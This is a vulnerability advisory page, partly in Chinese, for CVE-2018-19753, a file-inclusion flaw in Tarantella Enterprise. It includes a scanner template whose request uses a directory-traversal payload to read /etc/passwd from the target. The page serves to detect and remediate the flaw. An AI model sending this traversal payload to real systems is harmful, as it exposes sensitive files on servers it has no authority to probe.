CVE-2018-19753: Tarantella Enterprise <3.11 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Tarantella Enterprise | POC: 已公开

漏洞描述

Tarantella Enterprise versions prior to 3.11 are susceptible to local file inclusion.

PoC代码[已公开]

id: CVE-2018-19753

info:
  name: Tarantella Enterprise <3.11 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    Tarantella Enterprise versions prior to 3.11 are susceptible to local file inclusion.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system.
  remediation: |
    Upgrade Tarantella Enterprise to version 3.11 or higher to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19753
    - http://seclists.org/fulldisclosure/2018/Nov/66
    - http://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-19753
    cwe-id: CWE-22
    epss-score: 0.73324
    epss-percentile: 0.98757
    cpe: cpe:2.3:a:oracle:tarantella_enterprise:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: tarantella_enterprise
  tags: cve,cve2018,packetstorm,seclists,tarantella,lfi,oracle

http:
  - method: GET
    path:
      - "{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e5b5a0816b12fba583d1d4d56ea201ec543d47c3ee53e9390ddc25a656ca09c10220167b839a711b7b43e290cd1a0682b4aa03f4e8b9d189fd653da2562ac156f64d:922c64590222798bb761d5b6d8e72950

相关漏洞推荐